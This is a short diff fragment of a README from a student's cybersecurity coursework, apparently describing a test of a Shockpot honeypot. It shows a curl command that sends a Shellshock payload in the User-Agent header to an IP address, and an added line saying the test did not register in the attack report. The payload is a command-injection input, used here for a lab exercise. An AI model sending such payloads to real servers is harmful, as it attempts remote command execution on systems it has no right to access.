alena-c/Cybersecurity/Unit 10/README.md

     curl -H "User-Agent: () { :; }; /bin/eject" http://35.229.118.28/

-Unfortunately, I was not able to
+Unfortunately, I was not able to test it, and this was the only honeypot that did not return anything to the __Attack Report__.

 <img src="shockpot-honeypot.gif">